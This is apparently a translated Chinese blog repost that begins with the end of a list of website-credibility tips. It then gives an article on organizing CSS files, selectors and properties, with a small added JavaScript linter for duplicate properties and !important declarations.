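21. Business credentials: provide the company's business license, industry licenses, relevant inspection certificates, a photo of the legal representative, and so on.
22. Company blog: several people maintaining one blog, similar to the Google China Blog (Google黑板报). Users trust the content on a blog more.
23. FAQ: guided by the questions customers care about, make one page; do not make too many pages, and do not turn it into a manual.
24. Staff photos: group photos from company events, showing the company's vitality.
25. Keep updating: every so often publish a professional article, a media report, a company anecdote, and so on.
26. Consistent style: for a group company, the sites of the head office, overseas companies and local companies should share the same layout, with a unified domain name format. Sites in different languages should not differ too much.
27. Original images: do not use images found all over the web, especially the picture of a customer service agent on the phone. If you can, it is best to buy from a professional stock image library.
28. Domain renewal: it is best to register for 10 years at once rather than renewing every year.
29. Navigation structure: do not let users press the "Back" button because they do not know how to continue.
30. Finally, a reposted article must always credit its source and author ^-^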

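[Repost] Website Design: Architecting CSS Sensibly

Now that browsers broadly support it, we have given CSS a mission it never had before. But the more we rely on CSS, the larger and more complex the style sheet files become. With that comes the challenge of maintaining and organizing the files.
(Once upon a time) a single CSS file was enough: all the rules gathered in one place, and adding, deleting and changing them was easy. Those days are long gone. (Now) when building a new site, you must take some time to plan how to organize and architect the CSS.

File organization

The first step in building a CSS system is drawing up an outline. (I believe) planning the organization of the CSS is as important as the site's directory structure. (HTMLor's note: the wording is a bit exaggerated, to help you remember.) No scheme fits every situation, so we will discuss some basic organization schemes and their respective pros and cons.

The main CSS file

Usually you can use one main CSS file to hold the rules shared by all pages. This file contains the default fonts, links, headers and other styles. With a main CSS file in place, we can begin to explore higher-level organization strategies.

Method 1: archetype-based
The most basic strategy is to separate CSS files by archetype page. If a site's home page, subpage and portfolio page are designed differently, the archetype-based strategy can be used. (Under this strategy) each page has its own dedicated CSS file.
When the number of archetypes is small, this method is simple, clear and effective. The problem appears when page elements do not sit neatly within each archetype page. If the subpage and the portfolio page share certain elements that the home page lacks, what should we do?
Put the shared elements in the main CSS file. This is not the purest solution, but it suits some specific situations. If the site is large, however, the main CSS file will quickly balloon, which defeats the original purpose of separating files: avoiding the import of unnecessarily large files.
Put a copy of the style code in both the portfolio-page and the subpage CSS files. That means maintaining redundant code, which we obviously do not want.
Create a new file shared by these two kinds of page. That sounds fine. But what if there are only 10 lines of code: do we create this file just to share those 10 lines? (htmlor's note: a sledgehammer to crack a nut?) The method is pure, but if the site is large and many pairs of pages share small numbers of elements (htmlor's note: say 30 pairs of pages each sharing 10 lines of code), it becomes cumbersome.
Create one separate CSS file containing the styles for all shared elements. This may be simpler, but it depends on the size of the site and the number of shared elements. One situation is annoying: a large CSS file is imported, but the page uses only a small part of its styles. Again, this defeats the original purpose of separating files.
This is what I call the overlap dilemma. Overlapping fragments of CSS rules come in many forms, and there is no completely clear-cut scheme for organizing them.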

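Method 2: based on page elements/blocks
If the site uses server-side includes, this method works well. For example, if a header include is used, it has its own corresponding CSS file. The footer or other includes can follow suit, each importing only its own CSS file. The method is simple and clean, but it may produce many small CSS files.
For instance, if the footer's styles need only 20 lines of CSS, creating a separate file is not worth it. The method also means every page includes a pile of CSS files, because there must be as many CSS files as there are includes.

Method 3: markup-based
This scheme is intuitive and practical, and similar to the previous one. If the site has 30 pages in total and 10 of them contain a form, you can create a CSS file dedicated to form styles and import it only on those 10 pages. If another 10 pages contain a table, create a file dedicated to table styles, and so on.

Other organization techniques
Besides organizing files by subjective methods, we also have to consider multiple media types such as print, handheld and screen. These are already clearly defined, but they remain a factor to consider when setting up the file structure. Once multiple media types must be supported, some rules in the main CSS file may have to be reconsidered.
Co-branding may also be an important factor. (htmlor's note: such as joga, launched jointly by google and nike.) If co-branding is involved, you must consider which elements should be adjusted to fit the other brand, for example by using separate CSS files.
There is one more often-overlooked technique: using nested @import statements. A CSS file can consist of just a series of @import statements, perhaps plus a few CSS rules. The site's main CSS file can be created entirely this way (using @import to bring in the style files for each part). If every page of the site imports 4 to 5 different CSS files, you should certainly consider this technique.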

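Organizing rules and selectors

Having covered file organization, let's discuss how to organize what is inside the files. Naturally, we want to move through a file unimpeded and quickly find the selector or rule we need to edit.

Redundancy vs. dependency

As Dave Shea says in his article "Redundancy vs. Dependency", you must constantly be aware of the cascade. You have to decide whether to group selectors (which means dependency) or to separate them (which means redundancy). Grouping keeps the code concise, but it creates dependencies and increases maintenance overhead. Not grouping increases file size and makes it hard to keep similar selectors consistent. Only by weighing this trade-off well can you make the right decision each time.

Grouping by relationship/context

Since file organization can be subjective, grouping rules and selectors according to their relationship to other parts is clearly the best approach. For example, if you use a container, a header and a footer to build the layout, they should be grouped together.
This seems simple, but it is not. For example, when adding the navigation in the header to the CSS, do you group it with its parent element or on its own? In this case it depends on the rule's context. Usually the header relates to the page layout and should be grouped with the other layout elements. The navigation is one block of the header and should be grouped with the header's other blocks, not with the header itself.

Using comments

As with most code, comments are key to good organization. Each section should be clearly labeled according to what the CSS controls. It is best to make sure comments stand out visually, so that they can be located quickly while scrolling and skimming.
Doug Bowman makes brilliant use of CSS comments in his article "CSS Organization Tip #1: Flags". He explains in detail how to put an equals sign before the section name so that a text editor's find function can jump straight to a section.

Don't forget

You should understand specificity, the cascade and inheritance thoroughly, and make good use of them. Each of them can be your most fearsome enemy or your friendliest friend. When building a large site, whether you understand these subtleties determines whether what you build is a rock-solid system or a shoddy structure that cannot weather a storm. (HTMLor's note: this sentence is translated entirely freely, which felt good.)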

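Organizing attributes

We now understand how to organize files, and how to organize rules within a file, but one important organizational step remains (unmentioned): attributes. Although attributes are a simpler concept than the previous two, there are some very good methods for keeping rules tidy that are well worth mentioning.

Alphabetical order

When it comes to attributes, if there is one principle to follow, it is: al-pha-bet-ize. This does not actually help much with browsing attributes, but it prevents accidents such as one attribute value overriding another.
An example: countless times I have defined a margin value for some selector and then, some day later, inadvertently added another (either before or after it). (In that case) the later attribute naturally takes effect. If I do not know the second attribute exists, no matter how I adjust the first value and refresh the browser, I see no change on the page. (htmlor's note: I know this problem all too well.) If the attributes are sorted alphabetically, you will notice that margin is defined twice (because the two are adjacent), and the problem is naturally avoided.

Priority

When a site is complex and involves many CSS files, a large number of dependencies build up. Once you need to customize the style of one particular element, the !important option seems the best choice. True, !important can meet an immediate need, but it is better to find the root cause of the problem and then decide from the cascade whether it is really needed.
If you are familiar with the specificity, cascade and inheritance mentioned above, there is no need to cling to !important as the only tree. (htmlor's note: a whole forest awaits you~) It will still come in handy, of course, but be clear about the specific situation before using it. Never use !important as a shortcut or a fix just because you do not know where the problem lies.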
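The twice-defined margin and the casual use of !important described above can both be found mechanically. The following is an added example, not code from the original article: lintCss and SAMPLE_CSS are hypothetical names, the style sheet is constructed, and the parser assumes flat rule sets (no nested @media blocks, no semicolons inside values).

```javascript
// Added example: minimal linter for flat CSS rule sets (no nested @media blocks).
// lintCss and SAMPLE_CSS are hypothetical names; the style sheet is constructed.
const SAMPLE_CSS = `
/* =Layout */
#header { margin: 0 auto; padding: 10px; color: #333; margin: 20px; }
#nav li { float: left; }
/* =Footer */
#footer { color: #666 !important; font-size: 11px; }
.note { margin: 0; /* margin: 5px; */ padding: 0; }
`;

const isImportant = (value) => /!\s*important\s*$/i.test(value);

function lintCss(cssText) {
  const findings = [];
  // Strip comments first so commented-out declarations are not counted.
  const stripped = cssText.replace(/\/\*[\s\S]*?\*\//g, "");
  const ruleRe = /([^{}]+)\{([^{}]*)\}/g;
  let match;
  while ((match = ruleRe.exec(stripped)) !== null) {
    const selector = match[1].trim().replace(/\s+/g, " ");
    const effective = new Map(); // property -> value that currently wins in this rule
    for (const decl of match[2].split(";")) {
      const colon = decl.indexOf(":");
      if (colon === -1) continue; // blank or malformed fragment
      const prop = decl.slice(0, colon).trim().toLowerCase();
      const value = decl.slice(colon + 1).trim();
      if (!prop) continue;
      if (isImportant(value)) {
        findings.push({ type: "important", selector, prop, value });
      }
      if (!effective.has(prop)) {
        effective.set(prop, value);
        continue;
      }
      // Same property twice in one rule: the later declaration wins,
      // unless only the earlier one carries !important.
      const earlier = effective.get(prop);
      const laterWins = isImportant(value) || !isImportant(earlier);
      const winner = laterWins ? value : earlier;
      findings.push({
        type: "duplicate", selector, prop,
        effective: winner, ignored: laterWins ? earlier : value,
      });
      effective.set(prop, winner);
    }
  }
  return findings;
}

for (const finding of lintCss(SAMPLE_CSS)) console.log(JSON.stringify(finding));
```

A duplicate is a candidate for review rather than an error in every case, since some style sheets repeat a property on purpose as a fallback for older browsers.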

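Summary

As we come to rely on CSS and style sheets grow more complex, we need proper planning to avoid mistakes and keep the code easy to maintain. Since no flawless scheme exists, understanding how CSS works and the various ways to organize files, selectors and attributes will certainly help us write quality code that stands the test of time.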